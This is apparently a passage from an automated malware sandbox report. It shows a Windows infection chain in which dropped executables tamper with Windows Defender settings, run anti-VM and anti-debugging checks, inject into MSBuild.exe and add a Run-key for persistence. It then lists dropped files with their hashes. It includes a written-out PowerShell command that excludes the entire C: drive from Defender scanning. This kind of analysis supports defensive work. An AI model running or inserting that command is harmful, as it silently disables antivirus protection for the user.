                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4400 -prefsLen 34775 -prefMapHandle 4404 -prefMapSize 270279 -jsInitHandle 4408 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4416 -initialChannelId {e8bb763e-7b29-4022-a536-2bfbb03ce10d} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:3596
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5072 -prefsLen 35012 -prefMapHandle 5076 -prefMapSize 270279 -ipcHandle 5148 -initialChannelId {3a808171-5bb6-42cc-9ac4-cb874fd81804} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:5872
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5504 -prefsLen 32952 -prefMapHandle 5508 -prefMapSize 270279 -jsInitHandle 5512 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5520 -initialChannelId {1b79dda0-417f-449e-800e-d9eebbb0cd45} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:5948
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5692 -prefsLen 32952 -prefMapHandle 5696 -prefMapSize 270279 -jsInitHandle 5700 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5708 -initialChannelId {d16f7bdd-3da9-4757-965a-b91f22a261f5} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:5960
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5484 -prefsLen 32952 -prefMapHandle 5868 -prefMapSize 270279 -jsInitHandle 5872 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5880 -initialChannelId {3937fd3d-df25-4399-98d9-5c91b197216a} -parentPid 1032 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1032" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                  9⤵
                                                                  • Checks processor information in registry
                                                                  PID:5972
                                                          • C:\Users\Admin\AppData\Local\Temp\10419580101\e5367c195a.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10419580101\e5367c195a.exe"
                                                            6⤵
                                                            • Modifies Windows Defender DisableAntiSpyware settings
                                                            • Modifies Windows Defender Real-time Protection settings
                                                            • Modifies Windows Defender TamperProtection settings
                                                            • Modifies Windows Defender notification settings
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Windows security modification
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5996
                                                          • C:\Users\Admin\AppData\Local\Temp\10419590101\d11e195f79.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10419590101\d11e195f79.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4060
                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5236
                                                          • C:\Users\Admin\AppData\Local\Temp\10419600101\e94476edd2.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10419600101\e94476edd2.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:264
                                                          • C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1604
                                                          • C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:5148
                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                              cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                              7⤵
                                                                PID:5156
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                  8⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2176
                                                              • C:\Windows\system32\svchost.exe
                                                                "C:\Windows\system32\svchost.exe"
                                                                7⤵
                                                                • Downloads MZ/PE file
                                                                • Adds Run key to start application
                                                                PID:4896
                                                                • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                  "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5740
                                                                • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                  8⤵
                                                                    PID:5792
                                                    • C:\Windows\system32\AUDIODG.EXE
                                                      C:\Windows\system32\AUDIODG.EXE 0x4b8 0x510
                                                      1⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:700
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4344 -ip 4344
                                                      1⤵
                                                        PID:3676
                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3448
                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1380
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                        1⤵
                                                          PID:5292
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                          1⤵
                                                            PID:1720

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

                                                            Filesize

                                                            896KB

                                                            MD5

                                                            c0e32665e8a5f60adcdba4e9d3c58fbd

                                                            SHA1

                                                            56b1ae589373a3c5771980a31034d562e1697b37

                                                            SHA256

                                                            83537194282e7f0053572cde038ec53ea25becb13d3da39cd03adcfbdb72fa5b

                                                            SHA512

                                                            659dcc2b45c7ac87c1d78549699764b39e9bf61714d537fae8ea53b6da74f5313ad42052a8df7596cb236cd3c8f9c4c0c624adffa3cdf7bc501b6fe2ecf341d5

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\B59V21Q5\service[1].htm

                                                            Filesize

                                                            1B

                                                            MD5

                                                            cfcd208495d565ef66e7dff9f98764da

                                                            SHA1

                                                            b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                            SHA256

                                                            5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                            SHA512

                                                            31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\B59V21Q5\soft[1]

                                                            Filesize

                                                            3.0MB

                                                            MD5

                                                            91f372706c6f741476ee0dac49693596

                                                            SHA1

                                                            8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

                                                            SHA256

                                                            9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

                                                            SHA512

                                                            88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            16KB

                                                            MD5

                                                            e87c7a40d401a94cfadcee06ed882cfa

                                                            SHA1

                                                            595d75a22e9701eb0613944ec223fdd84946265c

                                                            SHA256

                                                            ec2b721ea142e7a353b3de65a9e9f44d41ea113a222a599820a9f1c74752d53d

                                                            SHA512

                                                            95b759c48aa9fc363a781a19807d8adcc1d44c65b066ff572f2b3bddcd5e3b9b19804e9a55f08ebae8373a49a496609dca5aae5819bb254e69ecfe703e8c8934

                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\tdlob5bw.default-release\cache2\entries\A585344A45AF937E3AB7D706291A9A3ED8D581D9

                                                            Filesize

                                                            13KB

                                                            MD5

                                                            aab4766c30709f7189abe40d1229c621

                                                            SHA1

                                                            8fb3d67d11020758105f4422cd900a8f9e992589

                                                            SHA256

                                                            951a80337653f21544bdb5300d13371c7c39f4a2d4ce06368365c34371263f2d

                                                            SHA512

                                                            551c1ff90b4e10a6712de037e15e40025aaff9442f79b7e05ee19cabe17dfaeefba3657cff3c5e82b0fbfe195ee22633c360e803acfc26e36f7354c85b231624

                                                          • C:\Users\Admin\AppData\Local\TempNCNCGWPVGUNJBGJW9YUO7A3XOV4ZDHPI.EXE

                                                            Filesize

                                                            1.8MB

                                                            MD5

                                                            7b4c5fa52c698720d7d9e45ed2d7a711

                                                            SHA1

                                                            0242af88692e8fd8e1075a762ae13cf315385a6c

                                                            SHA256

                                                            058476af0241212cf5ed6dd22bd2eba6ec72afea0364357fba9eb870f06c2368

                                                            SHA512

                                                            2358ea5f1a59cbd7041872bb3ce349dda31a559d8a697cd20443bef825f33602b1b41123dd7cf37b6a1d7d9cac03fe17bb08be8651b30968e20b8a5e6c788327

                                                          • C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe

                                                            Filesize

                                                            327KB

                                                            MD5

                                                            fda2e2ddccb519a2c1fb72dcaee2de6f

                                                            SHA1

                                                            efd50828acc3e182aa283c5760278c0da1f428a6

                                                            SHA256

                                                            cf70392e26ee7d6d24cb39499567052935664d37a1b49572f9d0b5f3f3189f57

                                                            SHA512

                                                            28c79ed9a9d5db3920b7e942c66670eec02046fa3d751ad18e9b3597caab76645b194bfa18bb5925ecfb8d201a291a44ee427ef39632f673db39edc43111c3cf

                                                          • C:\Users\Admin\AppData\Local\Temp\10416950101\3sZiUQa.exe

                                                            Filesize

                                                            8.0MB

                                                            MD5

                                                            00ef7099fe1630a82aec7bf3e845c106

                                                            SHA1

                                                            81b6e7f72824216a02a06fa6abc828d2568fbc14

                                                            SHA256

                                                            a87a6091b3f9e0f43f91f829ef4737b75fa608e0ffdd9f87ea98f2be3de6d1c9

                                                            SHA512

                                                            59972541aff304e67c34cefdf536f608d3ee979066e8216bbcd361b0056a4febbef8f11e5941c52fd3e1c75b6860f0c6fd9aeee5faea3dd94babbc98c1429a62

                                                          • C:\Users\Admin\AppData\Local\Temp\10417510101\KXtPusH.exe

                                                            Filesize

                                                            211KB

                                                            MD5

                                                            5c1bb6cac0b3da6e012442037cf62a64

                                                            SHA1

                                                            f21a600e3c03309e485668481a2890e9a1f27180

                                                            SHA256

                                                            d9d77d43ebceb7caf5bee3bf6ad57a608650da4c6542f6870943409c39e9fa7c

                                                            SHA512

                                                            dd57ac222984c6e72f98b2c22f2f744692c9ba447f41be06a89de2f926b0ce2dad03aecd224df71d24751661ce481cbd7c6301810e5e149e0118d2d132b4aba1

                                                          • C:\Users\Admin\AppData\Local\Temp\10419520101\8dcf8981c4.exe

                                                            Filesize

                                                            1.8MB

                                                            MD5

                                                            e9f1a2e79b92504ccea1b8613bf9030e

                                                            SHA1

                                                            96740f8ea5e566ab39cf2eb7c01bda63b8cc7541

                                                            SHA256

                                                            7f872c5918ee00e4e2cd4bf1adf505c01c6a661c9e8e326bc953a8e58674b7c5

                                                            SHA512

                                                            2d3398d2c1965057d234c77a443f279e9fa9a210aac4fc8d0c7768d17f64531325c08210b36190a2cf00b8b6eb3b7ea2cbe6e87a3637ba70ce40d4a19c24fc9a

                                                          • C:\Users\Admin\AppData\Local\Temp\10419530101\74899c17d4.exe

                                                            Filesize

                                                            4.5MB

                                                            MD5

                                                            82a660623656c064fb7a7598ff283512

                                                            SHA1

                                                            9962f734b944a3c60879d590d974db4eb85a41c5

                                                            SHA256

                                                            579aa629ade38640ab1fb3f8c9e7a1c172062d4740fc797456803db12415ca51

                                                            SHA512

                                                            e08d0a106869753789e2212c2eef998b56a20baf0080ceb9112eb6fa01e6e92751850fa2ee5e3a261adc30514f7b76bf2585dd0de3f3774011d06565d861f157

                                                          • C:\Users\Admin\AppData\Local\Temp\10419540101\5520df3a73.exe

                                                            Filesize

                                                            4.3MB

                                                            MD5

                                                            d7d5b2f460ab2a552ccd37ffe846f39a

                                                            SHA1

                                                            a84bd114c44827a07e29a548211c769bfda274c2

                                                            SHA256

                                                            5a19f74e5205b970c5f36c0c466f2f888412e14bf7f95b22856c4a7739e64eb1

                                                            SHA512

                                                            502e408d9fd0fc15bcc23b8f958a96cd8f26306513802f30e6ee0dda985ce409cbf99c7ff2385002d2de1be005317b8cb011cecd0989fed0da58c59e8b771b7f

                                                          • C:\Users\Admin\AppData\Local\Temp\10419550101\08f072925b.exe

                                                            Filesize

                                                            2.0MB

                                                            MD5

                                                            69688177ed1baa1e21ebf5b8cc5d416e

                                                            SHA1

                                                            eba68df7434baadb9a536f6cd7d66ff113a42ffa

                                                            SHA256

                                                            b59e061f2ea5a7f4cdd2a5edeead169998f9a9ee959e51386051f69a518a263c

                                                            SHA512

                                                            55fd5ea2b5fcfe6fa6bf79d3fe6e5a5e44e85a487d7709e4e5e047716aa33a9c6360491fe2d781f459ebe3d7e204cfd5cc751fc0eb9a11435fac959111e3d6cd

                                                          • C:\Users\Admin\AppData\Local\Temp\10419560101\f4bcfb7a05.exe

                                                            Filesize

                                                            2.4MB

                                                            MD5

                                                            6bcaa6f066af78f85f1106de1ea00031

                                                            SHA1

                                                            4981bdc7125f2460afc0b514241c785736d71268

                                                            SHA256

                                                            27613cc4f4a71db26084707ad958d9e8228e654e4ea575dd1c0dc7bbb92845cd

                                                            SHA512

                                                            1364694219b2730de483b201586da626889e36d661aa4c53b96e10baa5ee47c04f00e1779dec01335938538272bcc77a905f626f1a2f1e3a964c3b3d6972a96b

                                                          • C:\Users\Admin\AppData\Local\Temp\10419570101\458e534b04.exe

                                                            Filesize

                                                            950KB

                                                            MD5

                                                            dcfce6257bd41af54060a4429662d291

                                                            SHA1

                                                            b14fda486f0dcc3167432666aea136ef962f66bc

                                                            SHA256

                                                            1a3be077f95f1f86b8efae98b20b07d389225860d31027d1f0638841475f7612

                                                            SHA512

                                                            d8e6dd08a65a340dec6aa30f29e45990393c36d65372811108e754fdb4decc6f959abbd15bcd4a0cc1eb013c7fe3d6bcf42cb8672f3cd2681f032244b31b2842

                                                          • C:\Users\Admin\AppData\Local\Temp\10419580101\e5367c195a.exe

                                                            Filesize

                                                            1.6MB

                                                            MD5

                                                            5fc1c5eb9a034468541060c199beeb32

                                                            SHA1

                                                            d5f39e29fc056e56d62984a759bc396928cdcfd5

                                                            SHA256

                                                            25ccf0acdb6d0d78422a25b800472e22d3e6f00e1a7a58ef51bd53c364541650

                                                            SHA512

                                                            0148bafd450034dffe559d278211f7b5951d064866c446818f8d0fabfe8b887ea06fc5c08958811dc55481d88ca81039cafae36ee4c0932aecc53b101a0aa410

                                                          • C:\Users\Admin\AppData\Local\Temp\10419590101\d11e195f79.exe

                                                            Filesize

                                                            2.1MB

                                                            MD5

                                                            8b7a6718ca74360fe9f51999563d5bd4

                                                            SHA1

                                                            bba0641bc9c1360d8df011c5ad99d648536fd2a2

                                                            SHA256

                                                            bb27921192d981c37db53a0c53e5298d35b5bb219638c66eb1ee2d63ccd2096d

                                                            SHA512

                                                            3b3fe72040fadbb15273e2bbf6ccdd02a2cf8c736d1d8dac3a5c006274ac9d31e3c44dc5f793afbc98696bd958714b48f8a5efe7e7f2f17a5ceb6b5d308392d0

                                                          • C:\Users\Admin\AppData\Local\Temp\10419600101\e94476edd2.exe

                                                            Filesize

                                                            358KB

                                                            MD5

                                                            e604fe68e20a0540ee70bb4bd2d897d0

                                                            SHA1

                                                            00a4d755d8028dbe2867789898b1736f0b17b31c

                                                            SHA256

                                                            6262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361

                                                            SHA512

                                                            996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89

                                                          • C:\Users\Admin\AppData\Local\Temp\10419600101\e94476edd2.exe

                                                            Filesize

                                                            716KB

                                                            MD5

                                                            57a5e092cf652a8d2579752b0b683f9a

                                                            SHA1

                                                            6aad447f87ab12c73411dec5f34149034c3027fc

                                                            SHA256

                                                            29054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34

                                                            SHA512

                                                            5759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f

                                                          • C:\Users\Admin\AppData\Local\Temp\10419610101\Rm3cVPI.exe

                                                            Filesize

                                                            354KB

                                                            MD5

                                                            27f0df9e1937b002dbd367826c7cfeaf

                                                            SHA1

                                                            7d66f804665b531746d1a94314b8f78343e3eb4f

                                                            SHA256

                                                            aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                                                            SHA512

                                                            ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                                                          • C:\Users\Admin\AppData\Local\Temp\10419620101\UZPt0hR.exe

                                                            Filesize

                                                            1.2MB

                                                            MD5

                                                            18b6c58f5f099a577c2f322eba74d1e9

                                                            SHA1

                                                            11cf8353e6adcf12061b4afb95c63308bda399b2

                                                            SHA256

                                                            2c5b54f2576e1524d5dc1c5405d2b8cfe72fc16ca2a1c7c319e0961833d9d069

                                                            SHA512

                                                            3f83df8396fe63f1a0cc1595b9923ebf879e69a24d4cff96cb4460b7143a3f2eaca99379f955af10ad06cc6d8a0fc2d846d40aaafcb258b4a4e6956de89d4d49

                                                          • C:\Users\Admin\AppData\Local\Temp\261.exe

                                                            Filesize

                                                            88KB

                                                            MD5

                                                            89ccc29850f1881f860e9fd846865cad

                                                            SHA1

                                                            d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                            SHA256

                                                            4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                            SHA512

                                                            0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                          • C:\Users\Admin\AppData\Local\Temp\8194.tmp\8195.tmp\8196.bat

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            e5ddb7a24424818e3b38821cc50ee6fd

                                                            SHA1

                                                            97931d19f71b62b3c8a2b104886a9f1437e84c48

                                                            SHA256

                                                            4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                                            SHA512

                                                            450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gc0ba1ml.sh3.ps1

                                                            Filesize

                                                            60B

                                                            MD5

                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                            SHA1

                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                            SHA256

                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                            SHA512

                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                          • C:\Users\Admin\AppData\Local\Temp\svchost015.exe

                                                            Filesize

                                                            2.9MB

                                                            MD5

                                                            b826dd92d78ea2526e465a34324ebeea

                                                            SHA1

                                                            bf8a0093acfd2eb93c102e1a5745fb080575372e

                                                            SHA256

                                                            7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

                                                            SHA512

                                                            1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

                                                          • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                            Filesize

                                                            11KB

                                                            MD5

                                                            25e8156b7f7ca8dad999ee2b93a32b71

                                                            SHA1

                                                            db587e9e9559b433cee57435cb97a83963659430

                                                            SHA256

                                                            ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986

                                                            SHA512

                                                            1211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56

                                                          • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                            Filesize

                                                            502KB

                                                            MD5

                                                            e690f995973164fe425f76589b1be2d9

                                                            SHA1

                                                            e947c4dad203aab37a003194dddc7980c74fa712

                                                            SHA256

                                                            87862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171

                                                            SHA512

                                                            77991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2

                                                          • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                            Filesize

                                                            14.0MB

                                                            MD5

                                                            bcceccab13375513a6e8ab48e7b63496

                                                            SHA1

                                                            63d8a68cf562424d3fc3be1297d83f8247e24142

                                                            SHA256

                                                            a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9

                                                            SHA512

                                                            d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484

                                                          • C:\Users\Admin\AppData\Local\Temp\yL7W3nM1t.hta

                                                            Filesize

                                                            717B

                                                            MD5

                                                            0998960ce092ea4f99eb501c1ae90513

                                                            SHA1

                                                            24e0038a5d0e8ae8fae795772a72d46935bec139

                                                            SHA256

                                                            5cfcbd88042915c1733abdb480c0e0a27ad08c7e06671a8a031fe26f2e36181f

                                                            SHA512

                                                            84e626727161f6389f952a7bc2773291a88ae259a5f30b86a453ba213f6f9e9958a2e55ac01ff82216c4abf2ec799ae9824d23fbee77af1f6e8cc92f244e6323

                                                          • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe

                                                            Filesize

                                                            768KB

                                                            MD5

                                                            f87a45c8c5e4ba2e837262b2f7e7fc9b

                                                            SHA1

                                                            01c34e434bad7b0d790ca7c08a01dea3d6c33f0b

                                                            SHA256

                                                            84ef2ae91bfacb8364617adf88a4c004dfaada41fcb8d33a907d374558f8d838

                                                            SHA512

                                                            9c44de531184782dcc8cd46f8b84eb1118fdb70b3a0abd20d9865a4ee0be04a17b9780c7a8ffacbbe03af07519418ae3f557d61f1e4018249b09a7a3c0242500

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\AlternateServices.bin

                                                            Filesize

                                                            17KB

                                                            MD5

                                                            28cb042bd85216383eb94a39d05593ef

                                                            SHA1

                                                            057005a1db424785086f4f88ae9ae7eacbe2e0ac

                                                            SHA256

                                                            83199449b9a315515ccc98326808b0ee3b54ad8b59aff2b78818e8599dd293ec

                                                            SHA512

                                                            60633c499f6542fe184f6c7b3c39aac14d5afabce98a862d5009db1904fe2d7cf2963a62103809d977b3b0b1f9eb4cbc6af1f556e51e5094e32ce38ba5b23d33

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\AlternateServices.bin

                                                            Filesize

                                                            8KB

                                                            MD5

                                                            7df49114f3fc64457eff737dc3fdce75

                                                            SHA1

                                                            8e9c178f48551d0acdd7fd0d6edab2ef13feb798

                                                            SHA256

                                                            7acf855c97568527a3a6c04be40b7165c8936808b49c191555d4d603f5e7477f

                                                            SHA512

                                                            f425da4bdebe41ed504c4ef2b0793e29bc1e7d6004cddb821aaf127bf6982b56b7059534a34b9f44bb1ff20f9975e6ad97c91856caa9109be51b246229ba6cf6

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\db\data.safe.tmp

                                                            Filesize

                                                            5KB

                                                            MD5

                                                            19962c84aec8e3aecb466c905f8eb344

                                                            SHA1

                                                            e1694283db78d90685741e3a8a1a1d382155beb2

                                                            SHA256

                                                            420eb7c1d46827b5877c432207225556e92aecb98c004e0a30c5f58f47db642f

                                                            SHA512

                                                            57034cd4df58d9f87c3da0e71474237369b2649bea623e8a82015b570311f846077643eb0eeef8b0731d51da656783837f5af8106fe12d78aa300da2b52aa1d8

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\db\data.safe.tmp

                                                            Filesize

                                                            7KB

                                                            MD5

                                                            04b6d88830a86eef984584a4f3993a28

                                                            SHA1

                                                            ddcfc633b90984e6084a8be1c3ae5b40b646e2dc

                                                            SHA256

                                                            50cc80479d78dc85f22fa7b6bfdda20490e2ed1deaed8f76859e89a3065cad00

                                                            SHA512

                                                            4cec36a42496d76e8c0552d0f408e8ed5e6bb00d59ea7c4a05275489bac1a41cfe789a01908a13c08dc800c07b9e1ff686639b35080831ebeda16f19b955fe2e

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\events\events

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            9f96f9f2ee6bcefa0673fec04422c080

                                                            SHA1

                                                            ea4a6a786ab88444292f45fcf98ad966d8f0cfa7

                                                            SHA256

                                                            e5bfe5d0a61621a5e2449c88e6b73eba2a7cf16d97544f9c637117ed74cc57ea

                                                            SHA512

                                                            406831220eaa9143d9f76a77da860d2a3db27d37a8bcba52e9881c51a422012b346297f5544279eeb234b90bff5c7f6fac226e70b700b2fd7544e1ad45bac90a

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tdlob5bw.default-release\datareporting\glean\pending_pings\0594b2ab-8974-4831-811d-e91573e8e567

                                                            Filesize

                                                            886B

                                                            MD5

                                                            54c1fb4ee3112b2ffdd570cf6c57300f

                                                            SHA1

                                                            069bc40d8f845f24cc975a2ff1057738e24382a9

                                                            SHA256

                                                            65647563edbea09f42482be4b52bb82a5da1e18d054722bf8b7561b5bece5dd3

                                                            SHA512

                                                            92d77bb6853361fa4b9c541e644abe967962ae957b7dc98e6ae4ff69048c8efedd6e78985a4afe962b35f457c4c2401a8c76f39245f387b380b990fde21c60bc

